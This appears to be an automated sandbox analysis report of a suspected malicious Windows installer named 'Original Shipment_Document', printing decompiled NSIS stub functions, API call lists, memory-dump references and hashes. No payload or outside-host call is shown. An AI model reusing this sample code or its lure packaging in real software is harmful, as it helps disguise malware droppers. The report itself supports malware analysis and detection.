									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                0x00406544
                                                0x00406544
                                                0x00406544
                                                0x0040654a
                                                0x0040654f
                                                0x00406560
                                                0x00406560
                                                0x00406568
                                                0x00406569
                                                0x0040656a
                                                0x0040656b
                                                0x0040656e
                                                0x00406576
                                                0x00406578
                                                0x00406589
                                                0x0040658c
                                                0x0040658c
                                                0x00406590
                                                0x00406596
                                                0x00406599
                                                0x00406774
                                                0x00406774
                                                0x0040677f
                                                0x0040678b
                                                0x0040678b
                                                0x00000000
                                                0x0040659f
                                                0x004065a4
                                                0x004065b9
                                                0x004065ba
                                                0x004065c0
                                                0x00406752
                                                0x00406760
                                                0x00406763
                                                0x00406763
                                                0x00406754
                                                0x00406757
                                                0x0040675a
                                                0x0040675c
                                                0x0040675c
                                                0x00406765
                                                0x00406765
                                                0x0040676b
                                                0x0040676e
                                                0x004065a1
                                                0x00000000
                                                0x004065a1
                                                0x00000000
                                                0x0040676e
                                                0x004065c6
                                                0x004065c9
                                                0x004065d8
                                                0x004065df
                                                0x004065eb
                                                0x004065ee
                                                0x004065f1
                                                0x004065f2
                                                0x004065f7
                                                0x004065fd
                                                0x00406600
                                                0x00406603
                                                0x004066f6
                                                0x004066fb
                                                0x0040672e
                                                0x00406733
                                                0x00406738
                                                0x0040673d
                                                0x0040673d
                                                0x00406742
                                                0x00406748
                                                0x0040674b
                                                0x00000000
                                                0x0040674b
                                                0x004066fd
                                                0x00406700
                                                0x00406703
                                                0x00406718
                                                0x0040671f
                                                0x00406705
                                                0x0040670c
                                                0x0040670c
                                                0x00406727
                                                0x0040672a
                                                0x004066ee
                                                0x004066ef
                                                0x004066ef
                                                0x00000000
                                                0x0040672a
                                                0x00406610
                                                0x00406614
                                                0x00406614
                                                0x00406615
                                                0x00406617
                                                0x00406654
                                                0x00406657
                                                0x00406667
                                                0x0040666a
                                                0x00406672
                                                0x00406678
                                                0x00406678
                                                0x004066d3
                                                0x004066d3
                                                0x004066d5
                                                0x00000000
                                                0x00000000
                                                0x0040667c
                                                0x00406681
                                                0x00406682
                                                0x00406684
                                                0x0040669b
                                                0x004066a9
                                                0x004066af
                                                0x004066b1
                                                0x004066cf
                                                0x004066cf
                                                0x004066cf
                                                0x00000000
                                                0x004066cf
                                                0x004066b7
                                                0x004066c0
                                                0x004066c3
                                                0x004066c9
                                                0x004066cd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066cd
                                                0x00406695
                                                0x00406697
                                                0x00406699
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406699
                                                0x00000000
                                                0x004066d3
                                                0x0040665f
                                                0x00000000
                                                0x00406619
                                                0x00406637
                                                0x00406640
                                                0x004066dd
                                                0x004066e1
                                                0x004066e9
                                                0x004066e9
                                                0x00000000
                                                0x004066e1
                                                0x0040664a
                                                0x004066d7
                                                0x004066db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066db
                                                0x00406617
                                                0x00000000
                                                0x004065a4

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040665F
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000), ref: 00406743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-2469393281
                                                • Opcode ID: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
                                                • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                • Opcode Fuzzy Hash: caff3a63cdf462ad28e28b098a8ca9bbcc2bb6c884f685db01e738e9c1691dfa
                                                • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 784 40176f-401794 call 402da6 call 405e4d 789 401796-40179c call 406507 784->789 790 40179e-4017b0 call 406507 call 405dd6 lstrcatW 784->790 795 4017b5-4017b6 call 40678e 789->795 790->795 799 4017bb-4017bf 795->799 800 4017c1-4017cb call 40683d 799->800 801 4017f2-4017f5 799->801 808 4017dd-4017ef 800->808 809 4017cd-4017db CompareFileTime 800->809 802 4017f7-4017f8 call 405fd2 801->802 803 4017fd-401819 call 405ff7 801->803 802->803 811 40181b-40181e 803->811 812 40188d-4018b6 call 405569 call 4032b4 803->812 808->801 809->808 813 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 811->813 814 40186f-401879 call 405569 811->814 824 4018b8-4018bc 812->824 825 4018be-4018ca SetFileTime 812->825 813->799 846 401864-401865 813->846 826 401882-401888 814->826 824->825 828 4018d0-4018db FindCloseChangeNotification 824->828 825->828 829 402c33 826->829 832 4018e1-4018e4 828->832 833 402c2a-402c2d 828->833 834 402c35-402c39 829->834 836 4018e6-4018f7 call 406544 lstrcatW 832->836 837 4018f9-4018fc call 406544 832->837 833->829 843 401901-402398 836->843 837->843 847 40239d-4023a2 843->847 848 402398 call 405b67 843->848 846->826 849 401867-401868 846->849 847->834 848->847 849->814
                                                C-Code - Quality: 61%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen")), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507("C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp", _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, "C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp");
						_t64 = E00405B67("C:\Users\hardz\AppData\Local\Temp\nse53EC.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x0040189d
                                                0x0040189e
                                                0x0040189f
                                                0x004018a2
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                  • Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,004033ED), ref: 004055C4
                                                  • Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll), ref: 004055D6
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse53EC.tmp$C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen$Call
                                                • API String ID: 1941528284-3915240129
                                                • Opcode ID: 0fba69ac8ac68c92a69b3880046c7add487d5cb735b76d6a7e0826fb2fb974eb
                                                • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                • Opcode Fuzzy Hash: 0fba69ac8ac68c92a69b3880046c7add487d5cb735b76d6a7e0826fb2fb974eb
                                                • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 850 405569-40557e 851 405584-405595 850->851 852 405635-405639 850->852 853 4055a0-4055ac lstrlenW 851->853 854 405597-40559b call 406544 851->854 856 4055c9-4055cd 853->856 857 4055ae-4055be lstrlenW 853->857 854->853 858 4055dc-4055e0 856->858 859 4055cf-4055d6 SetWindowTextW 856->859 857->852 860 4055c0-4055c4 lstrcatW 857->860 861 4055e2-405624 SendMessageW * 3 858->861 862 405626-405628 858->862 859->858 860->856 861->862 862->852 863 40562a-40562d 862->863 863->852
                                                C-Code - Quality: 100%
                                                			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                0x0040556f
                                                0x00405579
                                                0x0040557e
                                                0x00405584
                                                0x0040558f
                                                0x00405592
                                                0x00405595
                                                0x0040559b
                                                0x0040559b
                                                0x004055a1
                                                0x004055a9
                                                0x004055ac
                                                0x004055c9
                                                0x004055cd
                                                0x004055d6
                                                0x004055d6
                                                0x004055e0
                                                0x004055e9
                                                0x004055f5
                                                0x004055fc
                                                0x00405600
                                                0x00405603
                                                0x00405616
                                                0x00405624
                                                0x00405624
                                                0x00405628
                                                0x0040562a
                                                0x0040562d
                                                0x00000000
                                                0x0040562d
                                                0x004055ae
                                                0x004055b6
                                                0x004055be
                                                0x004055c4
                                                0x00000000
                                                0x004055c4
                                                0x004055be
                                                0x004055ac
                                                0x00405639

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                • lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,004033ED), ref: 004055C4
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll), ref: 004055D6
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                  • Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                  • Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll,00000000), ref: 00406743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll
                                                • API String ID: 1495540970-22909775
                                                • Opcode ID: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
                                                • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                • Opcode Fuzzy Hash: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
                                                • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 864 4032b4-4032cb 865 4032d4-4032dc 864->865 866 4032cd 864->866 867 4032e3-4032e8 865->867 868 4032de 865->868 866->865 869 4032f8-403305 call 403499 867->869 870 4032ea-4032f3 call 4034af 867->870 868->867 874 403450 869->874 875 40330b-40330f 869->875 870->869 878 403452-403453 874->878 876 403315-403335 GetTickCount call 406a2f 875->876 877 403439-40343b 875->877 888 40348f 876->888 890 40333b-403343 876->890 879 403484-403488 877->879 880 40343d-403440 877->880 882 403492-403496 878->882 883 403455-40345b 879->883 884 40348a 879->884 885 403442 880->885 886 403445-40344e call 403499 880->886 891 403460-40346e call 403499 883->891 892 40345d 883->892 884->888 885->886 886->874 897 40348c 886->897 888->882 894 403345 890->894 895 403348-403356 call 403499 890->895 891->874 901 403470-403475 call 4060a9 891->901 892->891 894->895 895->874 902 40335c-403365 895->902 897->888 904 40347a-40347c 901->904 905 40336b-403388 call 406a4f 902->905 906 403435-403437 904->906 907 40347e-403481 904->907 910 403431-403433 905->910 911 40338e-4033a5 GetTickCount 905->911 906->878 907->879 910->878 912 4033f0-4033f2 911->912 913 4033a7-4033af 911->913 916 4033f4-4033f8 912->916 917 403425-403429 912->917 914 4033b1-4033b5 913->914 915 4033b7-4033e8 MulDiv wsprintfW call 405569 913->915 914->912 914->915 922 4033ed 915->922 919 4033fa-4033ff call 4060a9 916->919 920 40340d-403413 916->920 917->890 921 40342f 917->921 925 403404-403406 919->925 924 403419-40341d 920->924 921->888 922->912 924->905 926 403423 924->926 925->906 927 403408-40340b 925->927 926->888 927->924
                                                C-Code - Quality: 94%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E004060A9(_a8, 0x414ec0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
